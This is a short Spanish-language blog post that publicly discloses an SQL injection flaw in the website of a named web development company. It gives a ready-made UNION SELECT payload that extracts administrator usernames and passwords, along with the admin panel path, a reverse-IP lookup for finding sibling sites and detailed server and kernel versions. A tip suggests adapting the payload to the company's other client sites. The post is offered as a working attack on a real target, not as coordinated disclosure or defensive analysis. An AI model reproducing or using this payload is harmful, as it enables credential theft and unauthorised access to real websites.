Bug en web desarrolladora SUSTAM.COM


ahi haciendo un poco de pen-testing encontre una web con SQLi aqui les dejo la info

++++++++++++++++++++++++++++++++++++++++++++++++++++
web desarrolladora: SUSTAM.COM

Bug: SQLi

****************************************************
tabla:
administradores

****************************************************
columnas:

usuarios

clave
****************************************************
inyection:

-1+union+select+0,1,2,concat(usuario,0x3a,clave),4,5,6,7,8,9,10,11,12,13+from+administradores--

dato: varian los numeros de tablas en las webs, la vulnerable con mas frecuencia es la 3
*****************************************************
panel:

/admin
*****************************************************
DNSreverse:

http://www.ip-adress.com/reverse_ip/sustam.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

server info:
Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8. PHP/4.4.7
Kernel: Linux sustam02.sustam.com 2.6.18-128.2.1.el5PAE #1 SMP Tue Jul 14 07:15:01 EDT 2009 i686

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)